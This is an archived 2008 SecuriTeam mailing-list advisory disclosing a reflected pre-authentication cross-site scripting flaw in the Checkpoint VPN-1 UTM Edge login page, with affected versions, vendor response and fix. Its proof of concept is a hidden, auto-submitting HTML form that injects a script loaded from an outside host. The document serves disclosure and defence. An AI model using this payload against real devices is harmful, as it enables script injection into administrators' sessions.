[NEWS] Checkpoint VPN-1 UTM Edge Cross Site Scripting

From: SecuriTeam <support@xxxxxxxxxxxxxx>
Date: 6 Mar 2008 14:58:06 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

Checkpoint VPN-1 UTM Edge Cross Site Scripting
------------------------------------------------------------------------

SUMMARY

<http://www.checkpoint.com/> VPN-1 UTM Edge appliances "deliver unified
threat management to enterprises with branch offices and simplify security
deployments and manageability. VPN-1 UTM Edge appliances consolidate
proven enterprise-class technology into a single branch office solution
that does not compromise the corporate network and eliminates the branch
office as your weakest link. As part of Check Point's Unified Security
Architecture, VPN-1 UTM Edge can enforce a global security policy and
allows administrators to manage and update thousands of appliances as
easily as managing one."

Insufficient input validation and output encoding on the login page allows
attacker to perform html-injection by posting suitable string to the login
form handler. The injection leads to reflected pre-authentication cross
site scripting.

DETAILS

Vulnerable Systems:
* Checkpoint VPN-1 Edge W Embedded NGX version 7.0.48x

Immune Systems:
* Checkpoint VPN-1 Edge W Embedded NGX version 7.5.48

Form based authentication is used only when device is accessed using HTTP.
Authentication over HTTPS uses HTTP basic authentication.

The device does not accept the parameters in a GET request, POST request
has to be used instead - exploiting the XSS vulnerability requires
therefore a bit more effort compared to ordinary GET based reflected cross
site scripting vulnerability.

The current version can be checked from
http://xxx.xxx.xxx.xxx/pub/test.html where xxx.xxx.xxx.xxx is LAN IP
address of the device. The page also displays current product key.

Vendor response:
"Once users register the appliance and connect to the service center
(Safe@Office appliances), the latest firmware is automatically downloaded
to their appliance. For UTM-1 Edge appliances, the latest firmware version
can be downloaded from the Check Point download center. Currently, this is
version 7.5.48 that does not contain the reported issue. We believe that
customers are not exposed to this issue."

Proof of Concept:
<html>
<body onload="document.f.submit()">
<form name="f" method="post" action="http://192.168.10.1";
style="display:none">

<input name="user" value="'<script/src=//l7.fi></script>">

</form>
</body>
</html>

Solution:
Update to version 7.5.48

Disclosure Timeline:
19. February 2008 - Contacted Checkpoint by email
20. February 2008 - Vendor response.
6. March 2008 - Advisory was released

ADDITIONAL INFORMATION

The information has been provided by <mailto:henri.lindberg@xxxxxxxx>
Henri Lindberg.
The original article can be found at:
<http://www.louhi.fi/advisory/checkpoint_080306.txt>
http://www.louhi.fi/advisory/checkpoint_080306.txt

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Prev by Date: [NT] SafeNet Sentinel Protection and Key Server Directory Traversal
Next by Date: [NEWS] VLC Media Player Chunk Context Validation Error
Previous by thread: [NT] SafeNet Sentinel Protection and Key Server Directory Traversal
Next by thread: [NEWS] VLC Media Player Chunk Context Validation Error
Index(es):
- Date
- Thread

Relevant Pages

Re: Host-Base Firewall
... While hardware security solutions do serve a purpose and do defeat some attacks, they can not solve the human element problem or the evolution problem. ... A while back our research team performed an assessment of several security appliances as a part of an R&D project. ... When we assessed the appliance technology we discovered that the libraries and software that were being used were on average 1-3 years old. ...
(Security-Basics)
Re: Cisco Pix cert vs. Checkpoint cert in United States
... narrowly focused security or network specialist, ... blurring with appliances and distinct firewalls, ... >> specific to any vendor. ... > Pix OS is actually based on a PLAN9 kernel and its called finesse. ...
(comp.security.firewalls)
RE: Energy Policy Act of 2005: mini Y2k needed?
... I believe that Tripwire has a security update dealing with DST 2007. ... appliances are based on Windows 2000 and that might get interesting. ... obsolete and will require updates to computer operating systems. ...
(Security-Basics)
RE: [fw-wiz] Home Environment Cisco
... > I've been using Solaris, Linux, Windows, *BSD, and security ... > appliances for several years too. ... prior to the sudden appearance of all the blackbox security ... irc channels on most any irc network can ...
(Firewall-Wizards)
Checkpoint VPN-1 UTM Edge cross-site scripting
... Devices: Checkpoint VPN-1 UTM Edge ... "VPN-1 UTM Edge appliances deliver unified threat management to ... Copyright 2008 Louhi Networks Oy. ...
(Bugtraq)